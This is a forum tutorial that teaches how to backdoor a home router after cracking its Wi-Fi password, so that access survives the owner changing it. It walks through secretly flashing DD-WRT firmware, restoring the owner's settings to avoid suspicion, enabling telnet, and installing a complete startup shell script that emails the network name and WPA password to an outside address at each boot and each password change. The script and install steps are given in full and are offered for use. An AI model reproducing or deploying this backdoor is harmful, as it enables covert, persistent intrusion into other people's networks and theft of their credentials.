WAM

[align=center][img]http://i.imgur.com/uGvtLk2.png[/img][/align]
[align=center][size=large][b]
WAM - Wireless access maintainer[/b][/size][/align]

[align=center][b][size=medium][color=#00BFFF]As many of you know, gaining access to wireless network sometimes is not easy at all.[/color][/size][/b][/align]

[align=center]
Sure, if we can exploit WPS it is not so hard, but as you may notice less and less APs have WPS enabled and more APs have better WPS brute- force protection.
Basically this leaves us with “classic” WPA/WPA2 vulnerability: The 4- way handshake.
Now imagine: all the time put into effort, all the electricity bills caused by handshake cracking, everything just blown away by AP owner login credentials change…
Not really nice feeling, isn’t it? [/align]

[align=center][img]http://i.imgur.com/bkMAF1F.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]What can we do in such case? How can we prevent AP access loss?[/color][/size][/b][/align]

[align=center][b]Enabling remote control[/b] -> not going to help if IP is not static and if owner change router credentials
[b]Writing down WPS pin[/b] -> this usually helps, but it happened too many times that owner disabled it (ISP advice)
[b]Leave hidden guest network open[/b] -> Easily noticeable[/align]

[align=center][b][size=medium][color=#00BFFF]There is another option… Why not backdooring router?[/color][/size][/b][/align]

[align=center]There are a few ways to do this. Since most of household (our main targets I believe) routers have very limited amount of memory I’m going to present method which uses the smallest amount of space and has proven reliable to me – Not one network lost in little less than a year (and there were some password changes)!
[b]Nice, isn’t it?[/b][/align]

[align=center][img]http://i.imgur.com/bkMAF1F.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]Example will be shown on Linksys E1500 router.[/color][/size][/b][/align]

[align=center][b]To avoid rise of suspicion we perform steps below when there is NO activity in the network![/b]

After quick look at controll panel, we notice there is no telnet or SSH option to enable. This is bad, as we will need it.

There are workarounds:
A) Find more up to date firmware and check if it has telnet or SSH option
B) Check if router is supported by DD-WRT or other aftermarket firmware manufacturers (Tomato) – they usually give you more control over your machine (check DD-WRT support [url=http://www.dd-wrt.com/site/support/router-database]HERE[/url]).

Here, we decide to take option B).
Why – I am not in the mood for checking official firmware for their options and I know that DD-WRT (since they support this router) won’t let me down.

We notice that router (Linksys E1500) is supported by DD-WRT as shown on image below:[/align]

[align=center][img]http://shrani.si/f/2m/6H/3UF4RMGH/router-is-supported.png[/img][/align]

[align=center]
Now download your firmware – it should be something mentioning factory image -> DD-WRT image or first installation, like shown on image below:[/align]

[align=center]
[img]http://shrani.si/f/1f/d3/2SvLVHgf/for1stinstallation.png[/img][/align]

[align=center][b]Before firmware upgrade save all network settings![/b] There should be no changes meanwhile upgrading firmware, but just to be sure- Copy / Write down ALL network settings so you will be able to put network back up if needed.

Now find firmware update window (administration -> firmware upgrade) and perform upgrade:[/align]

[align=center][img]http://shrani.si/f/45/hn/483njVrB/update.png[/img][/align]

[align=center]In case of power shortage there is a chance of bricking the router!

After firmware upgrade is completed router [b]login credentials will change[/b]:
Username: root
Password: admin

Change them back to original ones to avoid rise of suspicion.

Some routers will delete current wireless network and create new opened one called “dd-wrt”.
After connecting back into network follow steps below to set network as it was before:

[b]1[/b]) Check WAN access. If everything is OK then you do not have to make any changes in connection settings. Else set the same settings you saved in previous step.
[b]2[/b]) Set wireless setting to same as before (ESSID, type of encryption, PSK) + set TX power to MAX :whistle:

Till now you may have noticed that GUI looks a bit different- Yes, this is the bad side of using third-party firmware. However there is workaround:

With tools like “firmware mod kit” and similar you can extract files from firmware and modify it. BUT (yes, there is always a but…) most of latest DD-WRT images GUI are protected and therefor difficult to change – thanks to companies which decided to change GUI and sell it as their own. As I said- this is difficult and requires different approaches for different firmware images and that’s why it won’t be covered in this tutorial.

Back to the topic…

Now we need to enable SSH or telnet management- your choice.

Since SSH requires 2 changes in settings (1st enabling SSH, 2nd turning SSH on) we decide to go with telnet which just needs to be turned on (administration -> management), as shown on picture below:[/align]

[align=center][img]http://shrani.si/f/j/Tl/2m9PvBhB/telnet.png[/img][/align]
[align=center]

Also, if there is JFFS/JFFS1/JFFS2 option to enable ((administration -> management)), then enable it, as shown on picture below:[/align]

[align=center][img]http://shrani.si/f/3X/kG/4xOyg5kr/jffs.png[/img][/align]

[align=center]Clean JFFS2 is selected as we do not want it full- we need few kB of space..
Select save and apply settings – router may reboot and you will have to reconnect.
Now go back to Clean JFFS2 setting and DISABLE it- then save and apply settings again. Router may reboot this time too. This gives us some free space.
It is not always necessary, but usually it has to be enabled for us to be able to continue our work.
I won’t bother explaining what JFFS is (be honnest, you are able to google it)- you can read about it [url=https://en.wikipedia.org/wiki/JFFS]HERE[/url][/align]

[align=center][img]http://i.imgur.com/bkMAF1F.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]Congrats, router is now ready for backdooring.[/color][/size][/b][/align]

[align=center]Before we continue let’s assume that you know how router works. Basically, we will be working with routers NVRAM, where settings are saved.[/align]

[align=center][u][b]IMPORTANT[/b][/u]:
DD-WRT expect our script to have UNIX line ending. You can still write it under windows, just be sure to save it right. Use program like DOS2UNIX and MAC2UNIX accessible [url=http://sourceforge.net/projects/dos2unix/]HERE[/url]

Or just use right settings before saving, like shown in example below :[/align]

[align=center][img]http://shrani.si/f/3w/UY/4uiIS84p/unix.png[/img][/align]

[align=center]
[b]If you ignore this, router won’t be able to execute it.[/b] [/align]

[align=center]Now power up terminal.
[b]If you use windows[/b] :omg: and have telnet disabled, enable it with: “dism /online /Enable-Feature /FeatureName:TelnetClient”

Connect to router: “telnet 192.168.2.1” and login with username “root” and routers login password.
As shown on picture below, first thing we do is check if “sendmail” is included in firmware.
Simply write command “sendmail” an press enter. If you get no error output, then it is included.[/align]

[align=center][img]http://shrani.si/f/1S/FC/4brvnvMO/sendmail.png[/img][/align]

[align=center]If you get an error, then you have to install sendmail first:
0) find out what package manager you are dealing with- usually dpkg, ipkg or opkg
1) create jffs/tmp/Xpkg (where X is correct character for package mannager)
2) run Xpkg update (where X is correct character for package mannager)
3) run Xpkg install sendmail (where X is correct character for package mannager)
4) If there are dependencies errors, install dependencies too

Now we have to find where in NVRAM  ESSID and PSK is saved. use command “nvram show | grep “typeESSIDhere”” and command “nvram show | grep “typePSKhere””.
You will get output similar to this one:[/align]

[align=center]
[img]http://shrani.si/f/26/hC/3uKSLsOd/grepgrep.png[/img][/align]

[align=center]There are ESSID and PSK in more than one variable. We need to locate the one that changes directly after ESSID and PSK change. After few ESSID and PSK changes and outputs shown below we locate such variables: in this example it is “wl0_ssid” for ESSID and “wl0_wpa_psk” for PSK. That is what we will use further in this tutorial.
If router have 2.4 GHz and 5 GHz network there will be 4 such variables instead of 2.

Now after we got fundamental variables names for this job we still need to find SMTP server- after each PSK change, PSK and some details will be emailed to us- [b]that’s our backdoor![/b] :thumbsup:

I suggest searching google for free SMTP servers. Basically you need to find information posted on picture below- There is exception: If SMTP does not require authentication then you need only servers address and port ([b]feel free to use the same SMTP server I am using[/b]).[/align]

[align=center][img]http://shrani.si/f/3e/2U/3uiN7jF4/smtp.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]Now let’s take a look at our script…[/color][/size][/b][/align]

[align=center]Use, modify and integrate it as you wish, but it would be nice to give credits to author :oui:

[b]Complete script is at the bottom of the page ![/b]

Edit following part to needs of your SMTP server. Descriptions of variables are in script :[/align]

[php]# INTERVAL [seconds] - Check every INTERVAL if PSK was changed
INTERVAL=60
# MAIL_SERVER [address:port] - SMTP server in form smtp.example.com:26
MAIL_SERVER=mail.crackingservice.com:26
# MAIL_USER [username] - SMTP server username if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_USER=username
# MAIL_PASS [password] - SMTP server password if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_PASS=password
# MAIL_FROM [sender@domain.com] - Email address which will be shown as sender. WARNING: some SMTP servers does not allow spoofing, so use right domain instead.
MAIL_FROM=gatherer@crackingservice.com
# DOMAIN_NAME [domain.com] - Domain of sender, SMTP server or recipient, not sure...
DOMAIN_NAME=crackingservice.com
# MAIL_TO [recipient@domain.com] - Email address to which collected data will be send
MAIL_TO=gatherer@crackingservice.com
[/php]

[align=center]Now we will declare function responsible for data gathering and email sending:[/align]

[php]# __sendmail - Function for data gathering and sending it via Email
# Current form: Email was (not) sent because of startup trigger! From HH.MM_dd.mm.yyyy on, ESSID 'essid of AP' expects PSK 'psk of AP'
__sendmail(){
	echo $STARTUP "From" $(date +%H.%M_%d.%m.%Y) "on, ESSID" "'"$(nvram get wl0_ssid)"'" "expects PSK" "'"$(nvram get wl0_wpa_psk)"'" | sendmail -S$MAIL_SERVER -f$MAIL_FROM -d$DOMAIN_NAME $MAIL_TO
}
[/php]

[align=center]Change [b]wl0_ssid[/b] and [b]wl0_wpa_psk[/b] to variables you got before.
Leave other parts alone and you will receive email in form of “Email was (not) sent because of startup trigger! From HH.MM_dd.mm.yyyy on, ESSID 'essid of AP' expects PSK 'psk of AP'”. If you know what you are doing, feel free to midify it.[/align]

[align=center]The part below is responsible for sending us email 30 seconds after router start up. After that, it changes “STARTUP” value, so we will know that sending of email was not triggered by router startup:[/align]

[php]# Email current settings 30 [seconds] after router startup. Then change STARTUP value for further emails
sleep 30
STARTUP="Email was sent because of startup trigger!"
__sendmail
STARTUP="Email was not sent because of startup trigger!"
[/php]

[align=center]
Now we will save current PSK, so we will be able to compare it with future PSKs and trigger email sending if they will mismatch:[/align]

[php]# Remember current PSK as wpa_psk_old
nvram set wpa_psk_old=`nvram get wl0_wpa_psk`
nvram commit
[/php]

[align=center]And finally the last part- the main loop. It checks if old and current PSK mismatch every “INTERVAL” seconds, and if they do sending of email is triggered and current PSK is saved as old PSK for further checking:[/align]

[php]# Infinite loop - commands till while loop below will be executed only once
# Some APs do not reboot after PSK is changed. Loop below takes care of that.
# Every INTERVAL [seconds] check if PSK was changed
while sleep $INTERVAL
do
	# Get current wpa PSK
	wpa_psk_current=`nvram get wl0_wpa_psk`
	wpa_psk_old=`nvram get wpa_psk_old`
	# If current wpa PSK is not the same as wpa PSK saved as wpa_psk_old
	if [ $wpa_psk_current != $wpa_psk_old ]; then
		# Send new data ro MAIL_TO email
		__sendmail
		# Set current wpa PSK as wpa_psk_old
		nvram set wpa_psk_old=$wpa_psk_current
		nvram commit
	fi
done[/php]

[align=center][b]Complete script:[/b][/align]

[php]#!/bin/sh
# WAM.startup
# WAM - wifi access maintainer will send AP PSK, ESSID and timestamp to email address EMAIL_TO on every router startup and whenever PSK is changed.
# Script can not survive factory reset- for this it has to be integrated into router firmware immage along with other changes (enable jffs, create directories)
# Script is created for and tested on dd-wrt firmwares
# NOTE: sendmail flags may vary with versions of installed busybox.
# SETUP: put WAM.startup into jffs/etc/config so it wont be deleted after router reboot.

# INTERVAL [seconds] - Check every INTERVAL if PSK was changed
INTERVAL=60
# MAIL_SERVER [address:port] - SMTP server in form smtp.example.com:26
MAIL_SERVER=mail.crackingservice.com:26
# MAIL_USER [username] - SMTP server username if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_USER=username
# MAIL_PASS [password] - SMTP server password if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_PASS=password
# MAIL_FROM [sender@domain.com] - Email address which will be shown as sender. WARNING: some SMTP servers does not allow spoofing, so use right domain instead.
MAIL_FROM=gatherer@crackingservice.com
# DOMAIN_NAME [domain.com] - Domain of sender, SMTP server or recipient, not sure...
DOMAIN_NAME=crackingservice.com
# MAIL_TO [recipient@domain.com] - Email address to which collected data will be send
MAIL_TO=gatherer@crackingservice.com

# __sendmail - Function for data gathering and sending it via Email
# Current form: Email was (not) sent because of startup trigger! From HH.MM_dd.mm.yyyy on, ESSID 'essid of AP' expects PSK 'psk of AP'
__sendmail(){
	echo $STARTUP "From" $(date +%H.%M_%d.%m.%Y) "on, ESSID" "'"$(nvram get wl0_ssid)"'" "expects PSK" "'"$(nvram get wl0_wpa_psk)"'" | sendmail -S$MAIL_SERVER -f$MAIL_FROM -d$DOMAIN_NAME $MAIL_TO
}

# Email current settings 30 [seconds] after router startup. Then change STARTUP value for further emails
sleep 30
STARTUP="Email was sent because of startup trigger!"
__sendmail
STARTUP="Email was not sent because of startup trigger!"

# Remember current PSK as wpa_psk_old
nvram set wpa_psk_old=`nvram get wl0_wpa_psk`
nvram commit

# Infinite loop - commands till while loop below will be executed only once
# Some APs do not reboot after PSK is changed. Loop below takes care of that.
# Every INTERVAL [seconds] check if PSK was changed
while sleep $INTERVAL
do
	# Get current wpa PSK
	wpa_psk_current=`nvram get wl0_wpa_psk`
	wpa_psk_old=`nvram get wpa_psk_old`
	# If current wpa PSK is not the same as wpa PSK saved as wpa_psk_old
	if [ $wpa_psk_current != $wpa_psk_old ]; then
		# Send new data ro MAIL_TO email
		__sendmail
		# Set current wpa PSK as wpa_psk_old
		nvram set wpa_psk_old=$wpa_psk_current
		nvram commit
	fi
done

[/php]

[align=center]Or download it from [url=http://www.crackingservice.com/ddwrt_sendmail/WAM.startup]HERE[/url]

[b]SCRIPT HAVE TO BE IN .startup TYPE OF FILE[/b] (so it will be executed at router startup)[/align]

[align=center][b][size=medium][color=#00BFFF]Backdoor installation[/color][/size][/b][/align]

[align=center]Now all we have to do is:

1) Upload script somewhere
2) create jffs/etc/config in router (just avoid temp folder as content gets deleted)
3) wget script to jffs/etc/config
4) make script executable (chmod +x)
5) manually perform test run
6) check if it works after router reboots

You may notice that I am a bit lazy, and that’s why I  made video regarding last 6 steps… I am tired of writing and explaining this. :tongue:

To my big suprise, it appears that video is [b]exactly[/b] the same length as Metallica - Nothing Else Matters…  So enjoy it as background music :thumbsup:[/align]

[align=center]
[video=youtube]https://www.youtube.com/watch?v=pOqVVEJ_zI8[/video][/align]


If there are any questions, feel free to ask :oui: